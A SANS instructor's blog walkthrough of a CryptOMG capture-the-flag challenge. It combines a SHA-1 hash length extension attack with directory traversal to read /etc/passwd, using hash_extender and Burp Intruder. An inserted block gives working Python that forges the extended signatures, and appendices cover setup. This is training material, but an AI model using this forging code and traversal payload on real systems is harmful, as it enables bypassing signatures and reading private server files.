I will be teaching SANS SEC642: Advanced Web App Penetration Testing, Ethical Hacking, and Exploitation Techniques at many events this year, and I am also the co-author of the course. AKA the most advanced web app pentest course on the planet, probably the galaxy! This is one of the many techniques that I will be exploring in this series of posts.

I had the opportunity to sit with my friend Ron Bowes @iagox86 a while back to talk about SEC642 content and the state of web application penetration testing in general. He mentioned hash length extension attacks, and that coincidentally he had written the absolute best tool to exploit it! Definitely something that we could consider adding. Ron has also done writeups for CTF challenges that can be solved using his tool.

So I have some of the ingredients that we can talk about. We have a topic, we have a tool, and all that we need is a vulnerable application. We found a couple that had been used in CTFs, and one that also included some other interesting crypto challenges, called CryptOMG by SpiderLabs. They published the solutions to the first and second challenges on their blog. This is the solution to the fifth challenge, which is a hash length extension attack, and of course we will use hash_extender to do so. Installing CryptOMG is covered in Appendix A.

Opening up the new site in a browser and we see this:

modern_webapp_p2_01

The challenge appears to be a Local File Include (LFI) to see the contents of /etc/passwd.

Selecting Challenge 5 and we see the following:

modern_webapp_p2_02

Selecting SHA1 as the Algorithm and clicking on the test link while proxying through Burp gives us the parameters that we presumably have to play with to succeed.

modern_webapp_p2_03

 

algo=sha1, file=test, and hash=dd03bd22af3a4a0253a66621bcb80631556b100e

 

Sending the same GET request to repeater and we see the following response:

modern_webapp_p2_04

We now have a baseline request that gives us a 200 response code, and presumably the contents of the file called test in the HTML.

If this were HMAC we would need the secret. Brute forcing that might take a while, so let’s try a hash extension attack. Without knowing the secret we can append to the file name parameter and try a directory traversal with an LFI attack. We just need to be able to create a valid hash. So our attack will look something like this:

algo=sha1, file=test/../../../../etc/passwd, and hash=??

The problem is that we do not know the secret, and also do not know the length of the secret. Both are needed to append our data to the input parameter, assuming that they did something like this to create the hash:

sha1(filename||secret)

Where they concatenate something that we can control with something that we do not control to generate a hash. The magic of this attack is that we can append to the filename and still generate a valid hash without knowing the secret! However, we do have to guess the length of the secret, or brute force it. In this case we are going to assume that the secret length lies between 10 and 40 bytes.

Enter hash_extender to the rescue. Downloading it from git and making it is quick and easy. The instructions are in Appendix B.

Running the following should give us some file names and hashes to try!

./hash_extender -f sha1 --data 'test' -s dd03bd22af3a4a0253a66621bcb80631556b100e --append '../../../../../../../../../etc/passwd' --secret-min=10 --secret-max=40 --out-data-format=html --table > hashesnsignatures.out

(I had intended to put a crazy one liner in there, but Ron is way cooler and more l33t than me.) The first time I tried it I had not put enough ../ in and got a 200 response code without the file contents. 9 seemed like a good number. If we are not successful we see a 404 response code and the HTML does not contain the file that we are looking for:
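To make the mechanics behind that command visible, here is the same extension done by hand in Python as an added example (my code, not hash_extender's and not the post's): it resumes SHA-1 from the leaked digest, inserts the padding the server's own hashing would have produced, and tries every secret length from 10 to 40 the way --secret-min/--secret-max do. It assumes the server hashes sha1(secret || filename) with the secret in front, which is the arrangement a length extension needs, and the secret in demo() is constructed only so the forgery can be checked locally; the server_check model also shows where an HMAC would close the hole.

```python
# Added example, not hash_extender's code: SHA-1 length extension by hand.
# ASSUMES the server computes sha1(secret || filename), the order the attack needs;
# the secret in demo() is constructed and used only to verify the forged signature.
import hashlib
import struct

def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & 0xFFFFFFFF

def _sha1_block(h, block):
    """One SHA-1 compression of a 64-byte block from state h (FIPS 180-4)."""
    w = list(struct.unpack(">16I", block))
    for i in range(16, 80):
        w.append(_rotl(w[i - 3] ^ w[i - 8] ^ w[i - 14] ^ w[i - 16], 1))
    a, b, c, d, e = h
    for i in range(80):
        if i < 20:
            f, k = (b & c) | (~b & d), 0x5A827999
        elif i < 40:
            f, k = b ^ c ^ d, 0x6ED9EBA1
        elif i < 60:
            f, k = (b & c) | (b & d) | (c & d), 0x8F1BBCDC
        else:
            f, k = b ^ c ^ d, 0xCA62C1D6
        a, b, c, d, e = (_rotl(a, 5) + f + e + k + w[i]) & 0xFFFFFFFF, a, _rotl(b, 30), c, d
    return [(x + y) & 0xFFFFFFFF for x, y in zip(h, (a, b, c, d, e))]

def sha1_padding(msg_len):
    """0x80, zero fill and 64-bit big-endian bit count that SHA-1 appends to msg_len bytes."""
    return b"\x80" + b"\x00" * ((55 - msg_len) % 64) + struct.pack(">Q", msg_len * 8)

def extend(sig_hex, data, append, secret_len):
    """From sig = sha1(secret||data) and a guessed len(secret), return (new_data, sig')
    with sig' == sha1(secret||new_data), where new_data = data||padding||append."""
    h = list(struct.unpack(">5I", bytes.fromhex(sig_hex)))      # resume from the leaked state
    new_data = data + sha1_padding(secret_len + len(data)) + append
    tail = append + sha1_padding(secret_len + len(new_data))     # blocks the server hashes next
    for i in range(0, len(tail), 64):
        h = _sha1_block(h, tail[i:i + 64])
    return new_data, "".join("%08x" % x for x in h)

def candidates(sig_hex, data, append, min_len, max_len):
    """One (secret_len, new_data, sig') per guess, like --secret-min/--secret-max."""
    return [(n,) + extend(sig_hex, data, append, n) for n in range(min_len, max_len + 1)]

def server_check(secret, filename, sig_hex):
    """Constructed model of the vulnerable check; an HMAC here would defeat the extension."""
    return hashlib.sha1(secret + filename).hexdigest() == sig_hex

def demo(secret=b"constructed-34-byte-demo-secret-xx"):
    """Guess lengths 10..40 as in the post; only the true length (34) verifies."""
    data, append = b"test", b"/../../../../../../../../../etc/passwd"
    sig = hashlib.sha1(secret + data).hexdigest()
    return [n for n, nd, s in candidates(sig, data, append, 10, 40) if server_check(secret, nd, s)]
```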

modern_webapp_p2_05

Running the results from hash_extender through Burp Intruder we get a hit. This was done with the hashes in one file and the strings in another, with both used as payloads in Pitchfork mode.

modern_webapp_p2_06

 

As it turns out the length of the secret was 34 bytes. Let’s see what we have!

modern_webapp_p2_07

 

Success! Without knowing a 34 character secret password we are still able to grab the contents of /etc/passwd through the hash extension attack.

This is one of the many practical attack techniques that we teach in the SANS course SEC642.

Also see:

Modern Web Application Penetration Testing Part 1, XSS and XSRF Together

I am teaching SEC642: Advanced Web App Penetration Testing, Ethical Hacking, and Exploitation Techniques at multiple SANS training events around the world in 2018.

Cheers, Adrien de Beaupré
Intru-shun.ca Inc.
Certified SANS Instructor https://www.sans.org/instructors/adrien-de-beaupre
Co-author of SANS SEC642: Advanced Web App Penetration Testing, Ethical Hacking, and Exploitation Techniques

 

References:

https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks

https://github.com/iagox86/hash_extender

https://github.com/SpiderLabs/CryptOMG

 

Appendix A: Installing CryptOMG: (Using Ubuntu 14.04; apache, mysql, and php5 are already installed)

# cd /var/www/html
# git clone https://github.com/SpiderLabs/CryptOMG.git
# apt-get install libmcrypt4 php5-mysql php5-mcrypt
-- edit /var/www/html/includes/db.inc.php for mysql database settings
# php5enmod mcrypt
# service apache2 restart

 

Appendix B: Installing hash_extender: (again using Ubuntu, but in this case the Samurai WTF VM)

samurai@samuraiwtf:~/Downloads$ git clone https://github.com/iagox86/hash_extender.git
Cloning into 'hash_extender'...
remote: Counting objects: 587, done.
remote: Total 587 (delta 0), reused 0 (delta 0), pack-reused 587
Receiving objects: 100% (587/587), 153.34 KiB | 0 bytes/s, done.
Resolving deltas: 100% (396/396), done.
Checking connectivity... done.
samurai@samuraiwtf:~/Downloads$ cd hash_extender
samurai@samuraiwtf:~/Downloads/hash_extender$ make
[CC] buffer.o
[CC] formats.o
[CC] hash_extender.o
[CC] hash_extender_engine.o
[CC] test.o
[CC] util.o
[LD] hash_extender
[CC] hash_extender_test.o
[LD] hash_extender_test
samurai@samuraiwtf:~/Downloads/hash_extender$
samurai@samuraiwtf:~/Downloads/hash_extender$ ./hash_extender
hash_extender: --data or --file is required
--------------------------------------------------------------------------------
HASH EXTENDER
--------------------------------------------------------------------------------
By Ron Bowes <ron @ skullsecurity.net>
See LICENSE.txt for license information.

Usage: ./hash_extender <--data=<data>|--file=<file>> --signature=<signature> --format=<format> [options]

INPUT OPTIONS
-d --data=<data>
    The original string that we're going to extend.
--data-format=<format>
    The format the string is being passed in as. Default: raw.
    Valid formats: raw, hex, html, cstr
--file=<file>
    As an alternative to specifying a string, this reads the original string
    as a file.
-s --signature=<sig>
    The original signature.
--signature-format=<format>
    The format the signature is being passed in as. Default: hex.
    Valid formats: raw, hex, html, cstr
-a --append=<data>
    The data to append to the string. Default: raw.
--append-format=<format>
    Valid formats: raw, hex, html, cstr
-f --format=<all|format> [REQUIRED]
    The hash_type of the signature. This can be given multiple times if you
    want to try multiple signatures. 'all' will base the chosen types off
    the size of the signature and use the hash(es) that make sense.
    Valid types: md4, md5, ripemd160, sha, sha1, sha256, sha512, whirlpool
-l --secret=<length>
    The length of the secret, if known. Default: 8.
--secret-min=<min>
--secret-max=<max>
    Try different secret lengths (both options are required)

OUTPUT OPTIONS
--table
    Output the string in a table format.
--out-data-format=<format>
    Output data format.
    Valid formats: none, raw, hex, html, html-pure, cstr, cstr-pure, fancy
--out-signature-format=<format>
    Output signature format.
    Valid formats: none, raw, hex, html, html-pure, cstr, cstr-pure, fancy

OTHER OPTIONS
-h --help
    Display the usage (this).
--test
    Run the test suite.
-q --quiet
    Only output what's absolutely necessary (the output string and the
    signature)

The arguments you probably want to give are (see above for more details):
-d <data>
-s <original signature>
-a <data to append>
-f <hash format>
-l <length of secret>
samurai@samuraiwtf:~/Downloads/hash_extender$
